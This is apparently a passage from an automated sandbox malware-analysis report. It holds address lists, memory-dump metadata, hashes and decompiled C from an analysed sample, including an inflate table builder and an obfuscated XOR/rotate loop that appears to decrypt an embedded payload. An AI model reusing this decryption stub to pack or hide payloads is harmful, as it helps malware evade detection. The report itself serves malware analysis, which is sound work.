                                                                                                0x0040657e
                                                                                                0x00406584
                                                                                                0x00406586
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406588
                                                                                                0x00406588
                                                                                                0x0040658a
                                                                                                0x0040658c
                                                                                                0x00406595
                                                                                                0x00406595
                                                                                                0x0040658e
                                                                                                0x0040658e
                                                                                                0x00406591
                                                                                                0x00406591
                                                                                                0x00406597
                                                                                                0x00406599
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004065ff
                                                                                                0x004065ff
                                                                                                0x00406604
                                                                                                0x00406606
                                                                                                0x00406607
                                                                                                0x00406608
                                                                                                0x00406609
                                                                                                0x0040660f
                                                                                                0x00406612
                                                                                                0x00406615
                                                                                                0x00406618
                                                                                                0x0040661a
                                                                                                0x00406620
                                                                                                0x00406620
                                                                                                0x00406623
                                                                                                0x00406623
                                                                                                0x00406623
                                                                                                0x00406623
                                                                                                0x0040662c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004060a2
                                                                                                0x004060a5
                                                                                                0x004060a8
                                                                                                0x004060ae
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406285
                                                                                                0x00406285
                                                                                                0x00406285
                                                                                                0x00406288
                                                                                                0x0040628b
                                                                                                0x0040628d
                                                                                                0x00406290
                                                                                                0x00406296
                                                                                                0x0040629d
                                                                                                0x0040629f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406173
                                                                                                0x00406173
                                                                                                0x0040619b
                                                                                                0x0040619b
                                                                                                0x0040619b
                                                                                                0x0040619d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040617b
                                                                                                0x0040617b
                                                                                                0x0040617f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406185
                                                                                                0x00406185
                                                                                                0x00406188
                                                                                                0x0040618b
                                                                                                0x0040618e
                                                                                                0x00406190
                                                                                                0x00406192
                                                                                                0x00406195
                                                                                                0x00406198
                                                                                                0x00406198
                                                                                                0x00406198
                                                                                                0x0040619f
                                                                                                0x0040619f
                                                                                                0x004061a7
                                                                                                0x004061aa
                                                                                                0x004061b0
                                                                                                0x004061b3
                                                                                                0x004061b7
                                                                                                0x004061bb
                                                                                                0x004061be
                                                                                                0x004061c1
                                                                                                0x004061d9
                                                                                                0x004061d9
                                                                                                0x004061dc
                                                                                                0x004061ea
                                                                                                0x004061ed
                                                                                                0x004061de
                                                                                                0x004061de
                                                                                                0x004061e0
                                                                                                0x004061e7
                                                                                                0x004061e7
                                                                                                0x00406216
                                                                                                0x00406216
                                                                                                0x00406216
                                                                                                0x00406219
                                                                                                0x0040621b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004061f6
                                                                                                0x004061f6
                                                                                                0x004061fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406200
                                                                                                0x00406200
                                                                                                0x00406203
                                                                                                0x00406206
                                                                                                0x00406209
                                                                                                0x0040620b
                                                                                                0x0040620d
                                                                                                0x00406210
                                                                                                0x00406213
                                                                                                0x00406213
                                                                                                0x00406213
                                                                                                0x0040621d
                                                                                                0x0040621d
                                                                                                0x0040621f
                                                                                                0x00406221
                                                                                                0x0040622c
                                                                                                0x0040622f
                                                                                                0x00406232
                                                                                                0x00406234
                                                                                                0x00406236
                                                                                                0x00406238
                                                                                                0x0040623b
                                                                                                0x0040623e
                                                                                                0x00406243
                                                                                                0x00406246
                                                                                                0x00406249
                                                                                                0x0040624c
                                                                                                0x00406253
                                                                                                0x00406256
                                                                                                0x00406258
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040625e
                                                                                                0x0040625e
                                                                                                0x00406262
                                                                                                0x00406273
                                                                                                0x00406273
                                                                                                0x00406273
                                                                                                0x00406275
                                                                                                0x00406275
                                                                                                0x00406279
                                                                                                0x00406279
                                                                                                0x00406279
                                                                                                0x0040627b
                                                                                                0x0040627c
                                                                                                0x0040627f
                                                                                                0x0040627f
                                                                                                0x0040627f
                                                                                                0x00406282
                                                                                                0x00000000
                                                                                                0x00406282
                                                                                                0x00406264
                                                                                                0x00406264
                                                                                                0x00406267
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040626d
                                                                                                0x0040626d
                                                                                                0x00000000
                                                                                                0x0040626d
                                                                                                0x004061c3
                                                                                                0x004061c3
                                                                                                0x004061c5
                                                                                                0x004061c7
                                                                                                0x004061ca
                                                                                                0x004061cd
                                                                                                0x004061d1
                                                                                                0x004061d1
                                                                                                0x004062a5
                                                                                                0x004062a5
                                                                                                0x004062a8
                                                                                                0x004062af
                                                                                                0x004062b3
                                                                                                0x004062b5
                                                                                                0x004062b8
                                                                                                0x004062bb
                                                                                                0x004062c0
                                                                                                0x004062c3
                                                                                                0x004062c5
                                                                                                0x004062c6
                                                                                                0x004062c9
                                                                                                0x004062d4
                                                                                                0x004062d7
                                                                                                0x004062ee
                                                                                                0x004062f3
                                                                                                0x004062fa
                                                                                                0x004062ff
                                                                                                0x00406303
                                                                                                0x00406305
                                                                                                0x00406305
                                                                                                0x00406305
                                                                                                0x00406308
                                                                                                0x0040630a
                                                                                                0x00000000
                                                                                                0x00406310
                                                                                                0x00406310
                                                                                                0x00406314
                                                                                                0x0040631f
                                                                                                0x00406332
                                                                                                0x00406337
                                                                                                0x0040633c
                                                                                                0x0040633e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406344
                                                                                                0x00406344
                                                                                                0x00406347
                                                                                                0x00406349
                                                                                                0x00406357
                                                                                                0x00406357
                                                                                                0x0040635a
                                                                                                0x0040635a
                                                                                                0x0040635d
                                                                                                0x00406360
                                                                                                0x00406363
                                                                                                0x00406366
                                                                                                0x00406369
                                                                                                0x0040636c
                                                                                                0x00000000
                                                                                                0x0040636c
                                                                                                0x0040634b
                                                                                                0x0040634b
                                                                                                0x00406351
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406351
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004066f0
                                                                                                0x004066f0
                                                                                                0x004066f6
                                                                                                0x004066fc
                                                                                                0x00406701
                                                                                                0x00406707
                                                                                                0x0040670d
                                                                                                0x0040670f
                                                                                                0x00406712
                                                                                                0x0040671b
                                                                                                0x00406721
                                                                                                0x00406721
                                                                                                0x00406714
                                                                                                0x00406716
                                                                                                0x00406718
                                                                                                0x00406718
                                                                                                0x00406723
                                                                                                0x00406725
                                                                                                0x00406728
                                                                                                0x00406763
                                                                                                0x00406763
                                                                                                0x00000000
                                                                                                0x0040672a
                                                                                                0x0040672a
                                                                                                0x0040672a
                                                                                                0x00406730
                                                                                                0x00406733
                                                                                                0x00406735
                                                                                                0x0040676a
                                                                                                0x0040676c
                                                                                                0x00000000
                                                                                                0x0040676c
                                                                                                0x00000000
                                                                                                0x00406735
                                                                                                0x00000000
                                                                                                0x00405d74
                                                                                                0x00406742
                                                                                                0x00000000
                                                                                                0x00406742
                                                                                                0x00406156
                                                                                                0x00406158
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040615a
                                                                                                0x0040615a
                                                                                                0x0040615d
                                                                                                0x00000000
                                                                                                0x0040615d
                                                                                                0x004060a2
                                                                                                0x00406063
                                                                                                0x00406747
                                                                                                0x0040674a
                                                                                                0x0040674c
                                                                                                0x00406755
                                                                                                0x0040675b
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0040681A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                                				signed int _v8;
                                                                                                				unsigned int _v12;
                                                                                                				signed int _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				signed int _v24;
                                                                                                				signed int _v28;
                                                                                                				intOrPtr* _v32;
                                                                                                				signed int* _v36;
                                                                                                				signed int _v40;
                                                                                                				signed int _v44;
                                                                                                				intOrPtr _v48;
                                                                                                				intOrPtr _v52;
                                                                                                				void _v116;
                                                                                                				signed int _v176;
                                                                                                				signed int _v180;
                                                                                                				signed int _v240;
                                                                                                				signed int _t166;
                                                                                                				signed int _t168;
                                                                                                				intOrPtr _t175;
                                                                                                				signed int _t181;
                                                                                                				void* _t182;
                                                                                                				intOrPtr _t183;
                                                                                                				signed int* _t184;
                                                                                                				signed int _t186;
                                                                                                				signed int _t187;
                                                                                                				signed int* _t189;
                                                                                                				signed int _t190;
                                                                                                				intOrPtr* _t191;
                                                                                                				intOrPtr _t192;
                                                                                                				signed int _t193;
                                                                                                				signed int _t195;
                                                                                                				signed int _t200;
                                                                                                				signed int _t205;
                                                                                                				void* _t207;
                                                                                                				short _t208;
                                                                                                				signed char _t222;
                                                                                                				signed int _t224;
                                                                                                				signed int _t225;
                                                                                                				signed int* _t232;
                                                                                                				signed int _t233;
                                                                                                				signed int _t234;
                                                                                                				void* _t235;
                                                                                                				signed int _t236;
                                                                                                				signed int _t244;
                                                                                                				signed int _t246;
                                                                                                				signed int _t251;
                                                                                                				signed int _t254;
                                                                                                				signed int _t256;
                                                                                                				signed int _t259;
                                                                                                				signed int _t262;
                                                                                                				void* _t263;
                                                                                                				void* _t264;
                                                                                                				signed int _t267;
                                                                                                				intOrPtr _t269;
                                                                                                				intOrPtr _t271;
                                                                                                				signed int _t274;
                                                                                                				intOrPtr* _t275;
                                                                                                				unsigned int _t276;
                                                                                                				void* _t277;
                                                                                                				signed int _t278;
                                                                                                				intOrPtr* _t279;
                                                                                                				signed int _t281;
                                                                                                				intOrPtr _t282;
                                                                                                				intOrPtr _t283;
                                                                                                				signed int* _t284;
                                                                                                				signed int _t286;
                                                                                                				signed int _t287;
                                                                                                				signed int _t288;
                                                                                                				signed int _t296;
                                                                                                				signed int* _t297;
                                                                                                				intOrPtr _t298;
                                                                                                				void* _t299;
                                                                                                
                                                                                                				_t278 = _a8;
                                                                                                				_t187 = 0x10;
                                                                                                				memset( &_v116, 0, _t187 << 2);
                                                                                                				_t189 = _a4;
                                                                                                				_t233 = _t278;
                                                                                                				do {
                                                                                                					_t166 =  *_t189;
                                                                                                					_t189 =  &(_t189[1]);
                                                                                                					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                                					_t233 = _t233 - 1;
                                                                                                				} while (_t233 != 0);
                                                                                                				if(_v116 != _t278) {
                                                                                                					_t279 = _a28;
                                                                                                					_t267 =  *_t279;
                                                                                                					_t190 = 1;
                                                                                                					_a28 = _t267;
                                                                                                					_t234 = 0xf;
                                                                                                					while(1) {
                                                                                                						_t168 = 0;
                                                                                                						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						_t190 = _t190 + 1;
                                                                                                						if(_t190 <= _t234) {
                                                                                                							continue;
                                                                                                						}
                                                                                                						break;
                                                                                                					}
                                                                                                					_v8 = _t190;
                                                                                                					if(_t267 < _t190) {
                                                                                                						_a28 = _t190;
                                                                                                					}
                                                                                                					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                                						_t234 = _t234 - 1;
                                                                                                						if(_t234 != 0) {
                                                                                                							continue;
                                                                                                						}
                                                                                                						break;
                                                                                                					}
                                                                                                					_v28 = _t234;
                                                                                                					if(_a28 > _t234) {
                                                                                                						_a28 = _t234;
                                                                                                					}
                                                                                                					 *_t279 = _a28;
                                                                                                					_t181 = 1 << _t190;
                                                                                                					while(_t190 < _t234) {
                                                                                                						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                                						if(_t182 < 0) {
                                                                                                							L64:
                                                                                                							return _t168 | 0xffffffff;
                                                                                                						}
                                                                                                						_t190 = _t190 + 1;
                                                                                                						_t181 = _t182 + _t182;
                                                                                                					}
                                                                                                					_t281 = _t234 << 2;
                                                                                                					_t191 = _t299 + _t281 - 0x70;
                                                                                                					_t269 =  *_t191;
                                                                                                					_t183 = _t181 - _t269;
                                                                                                					_v52 = _t183;
                                                                                                					if(_t183 < 0) {
                                                                                                						goto L64;
                                                                                                					}
                                                                                                					_v176 = _t168;
                                                                                                					 *_t191 = _t269 + _t183;
                                                                                                					_t192 = 0;
                                                                                                					_t235 = _t234 - 1;
                                                                                                					if(_t235 == 0) {
                                                                                                						L21:
                                                                                                						_t184 = _a4;
                                                                                                						_t271 = 0;
                                                                                                						do {
                                                                                                							_t193 =  *_t184;
                                                                                                							_t184 =  &(_t184[1]);
                                                                                                							if(_t193 != _t168) {
                                                                                                								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                                								_t236 =  *_t232;
                                                                                                								 *((intOrPtr*)(0x42cdf0 + _t236 * 4)) = _t271;
                                                                                                								 *_t232 = _t236 + 1;
                                                                                                							}
                                                                                                							_t271 = _t271 + 1;
                                                                                                						} while (_t271 < _a8);
                                                                                                						_v16 = _v16 | 0xffffffff;
                                                                                                						_v40 = _v40 & 0x00000000;
                                                                                                						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                                						_t195 = _v8;
                                                                                                						_t186 =  ~_a28;
                                                                                                						_v12 = _t168;
                                                                                                						_v180 = _t168;
                                                                                                						_v36 = 0x42cdf0;
                                                                                                						_v240 = _t168;
                                                                                                						if(_t195 > _v28) {
                                                                                                							L62:
                                                                                                							_t168 = 0;
                                                                                                							if(_v52 == 0 || _v28 == 1) {
                                                                                                								return _t168;
                                                                                                							} else {
                                                                                                								goto L64;
                                                                                                							}
                                                                                                						}
                                                                                                						_v44 = _t195 - 1;
                                                                                                						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                                						do {
                                                                                                							_t282 =  *_v32;
                                                                                                							if(_t282 == 0) {
                                                                                                								goto L61;
                                                                                                							}
                                                                                                							while(1) {
                                                                                                								_t283 = _t282 - 1;
                                                                                                								_t200 = _a28 + _t186;
                                                                                                								_v48 = _t283;
                                                                                                								_v24 = _t200;
                                                                                                								if(_v8 <= _t200) {
                                                                                                									goto L45;
                                                                                                								}
                                                                                                								L31:
                                                                                                								_v20 = _t283 + 1;
                                                                                                								do {
                                                                                                									_v16 = _v16 + 1;
                                                                                                									_t296 = _v28 - _v24;
                                                                                                									if(_t296 > _a28) {
                                                                                                										_t296 = _a28;
                                                                                                									}
                                                                                                									_t222 = _v8 - _v24;
                                                                                                									_t254 = 1 << _t222;
                                                                                                									if(1 <= _v20) {
                                                                                                										L40:
                                                                                                										_t256 =  *_a36;
                                                                                                										_t168 = 1 << _t222;
                                                                                                										_v40 = 1;
                                                                                                										_t274 = _t256 + 1;
                                                                                                										if(_t274 > 0x5a0) {
                                                                                                											goto L64;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t275 = _v32;
                                                                                                										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                                										if(_t222 >= _t296) {
                                                                                                											goto L40;
                                                                                                										}
                                                                                                										while(1) {
                                                                                                											_t222 = _t222 + 1;
                                                                                                											if(_t222 >= _t296) {
                                                                                                												goto L40;
                                                                                                											}
                                                                                                											_t275 = _t275 + 4;
                                                                                                											_t264 = _t263 + _t263;
                                                                                                											_t175 =  *_t275;
                                                                                                											if(_t264 <= _t175) {
                                                                                                												goto L40;
                                                                                                											}
                                                                                                											_t263 = _t264 - _t175;
                                                                                                										}
                                                                                                										goto L40;
                                                                                                									}
                                                                                                									_t168 = _a32 + _t256 * 4;
                                                                                                									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                                									 *_a36 = _t274;
                                                                                                									_t259 = _v16;
                                                                                                									 *_t297 = _t168;
                                                                                                									if(_t259 == 0) {
                                                                                                										 *_a24 = _t168;
                                                                                                									} else {
                                                                                                										_t276 = _v12;
                                                                                                										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                                										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                                										_a5 = _a28;
                                                                                                										_a4 = _t222;
                                                                                                										_t262 = _t276 >> _t186;
                                                                                                										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                                										 *(_t298 + _t262 * 4) = _a4;
                                                                                                									}
                                                                                                									_t224 = _v24;
                                                                                                									_t186 = _t224;
                                                                                                									_t225 = _t224 + _a28;
                                                                                                									_v24 = _t225;
                                                                                                								} while (_v8 > _t225);
                                                                                                								L45:
                                                                                                								_t284 = _v36;
                                                                                                								_a5 = _v8 - _t186;
                                                                                                								if(_t284 < 0x42cdf0 + _a8 * 4) {
                                                                                                									_t205 =  *_t284;
                                                                                                									if(_t205 >= _a12) {
                                                                                                										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                                										_v36 =  &(_v36[1]);
                                                                                                										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                                										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                                									} else {
                                                                                                										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                                										_t208 =  *_t284;
                                                                                                										_v36 =  &(_t284[1]);
                                                                                                									}
                                                                                                									_a6 = _t208;
                                                                                                								} else {
                                                                                                									_a4 = 0xc0;
                                                                                                								}
                                                                                                								_t286 = 1 << _v8 - _t186;
                                                                                                								_t244 = _v12 >> _t186;
                                                                                                								while(_t244 < _v40) {
                                                                                                									 *(_t168 + _t244 * 4) = _a4;
                                                                                                									_t244 = _t244 + _t286;
                                                                                                								}
                                                                                                								_t287 = _v12;
                                                                                                								_t246 = 1 << _v44;
                                                                                                								while((_t287 & _t246) != 0) {
                                                                                                									_t287 = _t287 ^ _t246;
                                                                                                									_t246 = _t246 >> 1;
                                                                                                								}
                                                                                                								_t288 = _t287 ^ _t246;
                                                                                                								_v20 = 1;
                                                                                                								_v12 = _t288;
                                                                                                								_t251 = _v16;
                                                                                                								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                                									L60:
                                                                                                									if(_v48 != 0) {
                                                                                                										_t282 = _v48;
                                                                                                										_t283 = _t282 - 1;
                                                                                                										_t200 = _a28 + _t186;
                                                                                                										_v48 = _t283;
                                                                                                										_v24 = _t200;
                                                                                                										if(_v8 <= _t200) {
                                                                                                											goto L45;
                                                                                                										}
                                                                                                										goto L31;
                                                                                                									}
                                                                                                									break;
                                                                                                								} else {
                                                                                                									goto L58;
                                                                                                								}
                                                                                                								do {
                                                                                                									L58:
                                                                                                									_t186 = _t186 - _a28;
                                                                                                									_t251 = _t251 - 1;
                                                                                                								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                                								_v16 = _t251;
                                                                                                								goto L60;
                                                                                                							}
                                                                                                							L61:
                                                                                                							_v8 = _v8 + 1;
                                                                                                							_v32 = _v32 + 4;
                                                                                                							_v44 = _v44 + 1;
                                                                                                						} while (_v8 <= _v28);
                                                                                                						goto L62;
                                                                                                					}
                                                                                                					_t277 = 0;
                                                                                                					do {
                                                                                                						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                                						_t277 = _t277 + 4;
                                                                                                						_t235 = _t235 - 1;
                                                                                                						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                                					} while (_t235 != 0);
                                                                                                					goto L21;
                                                                                                				}
                                                                                                				 *_a24 =  *_a24 & 0x00000000;
                                                                                                				 *_a28 =  *_a28 & 0x00000000;
                                                                                                				return 0;
                                                                                                			}
                                                                                                0x00406b1b
                                                                                                0x00000000
                                                                                                0x00406b1b
                                                                                                0x00406b28
                                                                                                0x00406b28
                                                                                                0x00406b2b
                                                                                                0x00406b32
                                                                                                0x00406b35
                                                                                                0x00000000
                                                                                                0x00406958
                                                                                                0x004068d8
                                                                                                0x004068da
                                                                                                0x004068da
                                                                                                0x004068de
                                                                                                0x004068e1
                                                                                                0x004068e2
                                                                                                0x004068e2
                                                                                                0x00000000
                                                                                                0x004068da
                                                                                                0x0040684e
                                                                                                0x00406854
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                                                                                • Instruction ID: 233014ff28be9fca5e40c1aeee1244862099a57bf12043c09a7623bfee50ec27
                                                                                                • Opcode Fuzzy Hash: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                                                                                • Instruction Fuzzy Hash: D0C13B71A00259CBCF14DF68C4905EEB7B2FF99314F26826AD856B7380D734A952CF94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 91167e1082a4ff31738f1b644aec9a937fd435667615145e0e26f166ea111db3
                                                                                                • Instruction ID: ff55febec8dc599a4defa8cb513f6cb061e4dcf1dbaa94737291e7882441f159
                                                                                                • Opcode Fuzzy Hash: 91167e1082a4ff31738f1b644aec9a937fd435667615145e0e26f166ea111db3
                                                                                                • Instruction Fuzzy Hash: 83C1031585D2EDADCF06CBF981517FCBFB05E2A112F0841C6E4E5A6283C13A938EDB21
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 603c4acd0c85357d8b319ace5378ece20c212dfeb4bc3d885a5a5a309f44eaf7
                                                                                                • Instruction ID: 7ed666ec120cbadd83bd50cd5432a7e00930dfbaa6b72d9cea840a0eb8ac28f6
                                                                                                • Opcode Fuzzy Hash: 603c4acd0c85357d8b319ace5378ece20c212dfeb4bc3d885a5a5a309f44eaf7
                                                                                                • Instruction Fuzzy Hash: 7BB1E21595D2EDADCF06CBF981617FCBFB05D2A112F0845C6E4E5A6283C13A938EDB21
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E6EDAF5AF() {
                                                                                                				signed int _t40;
                                                                                                				signed int _t76;
                                                                                                				signed int _t77;
                                                                                                				char _t108;
                                                                                                
                                                                                                				L0:
                                                                                                				while(1) {
                                                                                                					L0:
                                                                                                					_t40 =  *0x6edc72a0; // 0x12ec
                                                                                                					 *0x6edc72a0 = _t40 + 1;
                                                                                                					L1:
                                                                                                					if( *0x6edc72a0 < 0x12ec) {
                                                                                                						L2:
                                                                                                						_t77 =  *0x6edc72a0; // 0x12ec
                                                                                                						_t1 =  &E6EDC2000 + _t77; // 0x7265766f
                                                                                                						 *0x6edc7f28 =  *_t1;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x00000068;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000005 | ( *0x6edc7f28 & 0x000000ff) << 0x00000003;
                                                                                                						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x0000001f;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000002 | ( *0x6edc7f28 & 0x000000ff) << 0x00000006;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0x5a;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x0000007a;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) + 0x98;
                                                                                                						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x00000021;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0x76;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x0000008b;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0xef;
                                                                                                						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0xcf;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000006 | ( *0x6edc7f28 & 0x000000ff) << 0x00000002;
                                                                                                						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x00000086;
                                                                                                						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000001 | ( *0x6edc7f28 & 0x000000ff) << 0x00000007;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000007 | ( *0x6edc7f28 & 0x000000ff) << 0x00000001;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x000000bb;
